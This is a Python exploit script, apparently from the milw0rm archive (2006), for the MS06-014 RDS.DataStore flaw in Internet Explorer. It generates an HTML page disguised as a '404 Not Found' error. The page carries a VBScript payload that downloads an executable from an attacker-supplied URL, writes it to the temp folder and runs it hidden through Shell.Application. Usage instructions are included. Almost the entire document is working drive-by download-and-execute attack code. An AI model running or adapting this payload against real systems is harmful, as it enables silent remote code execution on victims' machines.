#!/bin/sh - "exec" "python" "-O" "$0" "$@" __doc__ = """[BL4CK] - MS06-014 RDS.DataStore - Data Execution CVS-2006-0003 MS06-014 April 2006 *** this is a bit out-dated, but works very well *** Usage: ./bl4ck_ms06_014.py http://omfg.what.ho.st/~user/stage2.exe index.html Now upload index.html to the same webserver hosting your http://omfg.what.ho.st/~user/stage2.exe - redsand@blacksecurity.org """ __version__ = "1.0" import sys, random class MS06014: __version = "'[BL4CK] MS06-014 " + __version__ + "\r\n" __html = """ [BL4CK] || 404 Not Found

Not Found

""" __payload = """ ' due to how ajax works, the file MUST be within the same local domain dl = "URLFILE" ' create adodbstream object Set df = document.createElement("object") df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36" str="Microsoft.XMLHTTP" Set x = df.CreateObject(str,"") a1="Ado" a2="db." a3="Str" a4="eam" str1=a1&a2&a3&a4 str5=str1 set S = df.createobject(str5,"") S.type = 1 ' xml ajax req str6="GET" x.Open str6, dl, False x.Send ' Get temp directory and create our destination name fname1="bl4ck.com" set F = df.createobject("Scripting.FileSystemObject","") set tmp = F.GetSpecialFolder(2) ' Get tmp folder fname1= F.BuildPath(tmp,fname1) S.open ' open adodb stream and write contents of request to file ' like vbs dl+exec code S.write x.responseBody ' Saves it with CreateOverwrite flag S.savetofile fname1,2 S.close set Q = df.createobject("Shell.Application","") Q.ShellExecute fname1,"","","open",0 """ def __init__(self, file): self.__file = file def bl4ck(self): self.__payload = self.__payload.replace("URLFILE",self.__file) encoded = self.__payload ret = self.__html.replace("BL4CK_PAYLOAD",encoded) return ret if __name__ == '__main__': url=False out=False print "[BL4CK] MS06-014 - redsand@blacksecurity.org" print "url path to file must be on the same domain as the htm file" print "http://blacksecurity.org\r\n" argc = len(sys.argv) if(argc <= 2): print "USAGE: %s " % sys.argv[0] sys.exit(0) if(argc > 1): url = sys.argv[1] if(argc > 2): out = sys.argv[2] ms = MS06014(url) ret = ms.bl4ck() try: fsock = open(out, "w+", 0) try: fsock.write(ret ); finally: fsock.close() except IOError: pass print "Wrote %r bytes to: %s" % (len(ret),out) # milw0rm.com [2006-07-21]